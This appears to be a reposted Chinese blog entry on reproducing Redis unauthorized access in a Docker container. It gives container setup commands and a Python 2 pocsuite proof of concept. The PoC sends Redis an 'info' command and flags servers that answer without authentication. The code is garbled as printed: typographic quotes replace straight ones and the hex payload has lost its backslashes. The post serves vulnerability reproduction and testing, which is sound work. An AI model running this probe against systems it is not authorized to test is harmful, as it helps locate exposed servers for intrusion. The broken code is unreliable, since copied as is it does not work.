Redis未授权访问docker复现

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Redis未授权访问docker复现相关的知识,希望对你有一定的参考价值。

docker搜索Redis镜像
docker search redis
拉去镜像到本地
docker pull redis
查看下载好的镜像
docker images
运行镜像
docker run -p 6379:6379 -d redis

-p 将容器的6379端口映射到主机的6379端口。

-d 将容器后台运行。

查看运行中的镜像
docker ps

POC构成

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import socket
from pocsuite.utils import register
from pocsuite.poc import Output, POCBase

class TestPOC(POCBase):
    vulID = ‘0‘
    version = ‘1‘
    author = ‘nw01f‘
    vulDate = ‘2018-10-23‘
    createDate = ‘2018-10-23‘
    updateDate = ‘2018-10-23‘
    references = [‘http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/‘]
    name = ‘Redis Unauthorized‘
    appPowerLink = ‘https://www.redis.io‘
    appName = ‘Redis‘
    appVersion = ‘All‘
    vulType = ‘Unauthorized‘
    desc = ‘‘‘
            redis Unauthorized
    ‘‘‘
    samples = [‘‘]

    def _verify(self):
        result = {}
        payload = ‘x69x6ex66x6fx0dx0a‘     ##   info/r/n
        s = socket.socket()
        socket.setdefaulttimeout(4)
        try:
            host = self.url.split(‘:‘)[1].strip(‘/‘)
            if len(self.url.split(‘:‘)) > 2:
                port = int(self.url.split(‘:‘)[2].strip(‘/‘))
            else:
                port = 6379
            s.connect((host, port))
            s.send(payload)
            data = s.recv(1024)
            if data and ‘redis_version‘ in data:
                result[‘VerifyInfo‘] = {}
                result[‘VerifyInfo‘][‘url‘] = self.url
                result[‘VerifyInfo‘][‘port‘] = port
                result[‘VerifyInfo‘][‘result‘] = data[:20]
        except Exception as e:
            print e
        s.close()
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("error")
        return output
register(TestPOC)

参考链接

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

以上是关于Redis未授权访问docker复现的主要内容,如果未能解决你的问题,请参考以下文章

Redis未授权访问漏洞复现与利用

Redis未授权访问漏洞复现与利用

Redis未授权访问漏洞复现

MongoDB未授权访问漏洞复现及docker.mongodb下--auth授权验证

jboss 未授权访问漏洞复现

Docker远程API未授权访问导致的Docker逃逸